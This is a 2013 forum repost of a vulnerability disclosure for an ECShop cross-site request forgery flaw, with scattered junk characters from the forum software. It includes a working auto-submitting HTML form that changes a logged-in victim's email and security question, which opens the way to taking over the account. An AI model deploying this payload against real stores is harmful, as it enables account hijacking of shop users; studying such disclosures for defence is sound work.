中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
" i) J# h9 C6 t6 D4 C
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
7 [! z' [2 Q- f9 @9 [9 m; k
; N H$ g8 y; e$ z5 _
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
# c. U/ X/ A' W' C) I$ k9 ~) E
1 C- F4 m' P1 w6 F c) ?
详细说明:
: g: W- y O0 |
利用csrf和xss可以突破官方所说的“障碍”
8 p8 d; k& C: T& f
xss版本已经有人说明
* \/ A* [# F& j) y8 m
这里给出csrf版本
- \# H4 a2 z1 X$ B) J
! S _" }% N1 m0 i7 f) C
漏洞证明:
: F4 ], y% F) D% h. Y2 l
<html>
8 ~: @# ]& q# o
<body>
+ p, t- c. Y, l
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
% K/ E4 S; C* O! z7 q& X8 S# |
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
+ M d4 j+ Q# W. ]$ Y) l
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
/ d/ F n% ^$ J9 ]; t! z
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
1 u2 l/ k0 w) ~; w3 L" q
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
7 D U* h' }& _8 m, T" {% c' n7 d
</body>
* i+ s4 @- y1 e4 \3 e7 c6 y. i: W
<script>
( l/ W# p3 z$ `7 s$ X5 w$ T
document.forms[0].submit();
) q: h" N% O& X( }: R
</script>
0 U1 M( W. G! a+ B1 p/ C
</html>
8 t: V4 X3 j- w, Q9 `
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
9 D" O/ W9 a+ H7 [. ~# p
8 W1 h! E8 d4 P/ t# _
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2